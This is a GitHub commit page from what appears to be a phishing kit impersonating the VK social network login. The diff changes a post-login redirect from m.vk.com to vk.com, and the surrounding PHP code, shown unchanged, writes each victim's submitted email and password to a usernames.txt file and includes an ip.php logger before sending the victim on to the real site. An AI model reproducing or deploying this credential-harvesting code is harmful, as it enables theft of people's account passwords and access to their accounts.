Changed post to redirect to desktop version

(mobile devices will still be redirected to m.vk.com by vk)
This commit is contained in:
Alexey Mozzhakov 2018-06-28 10:21:46 +03:00 committed by GitHub
parent cd822fc063
commit 3cbb7c6e3b
No known key found for this signature in database
GPG Key ID: 4AEE18F83AFDEB23

View File

@ -2,5 +2,5 @@
include 'ip.php';
file_put_contents("usernames.txt", "[EMAIL]: " . $_POST['email'] . " [PASS]: " . $_POST['pass'] . "\n", FILE_APPEND);
header('Location: https://m.vk.com');
header('Location: https://vk.com');
exit();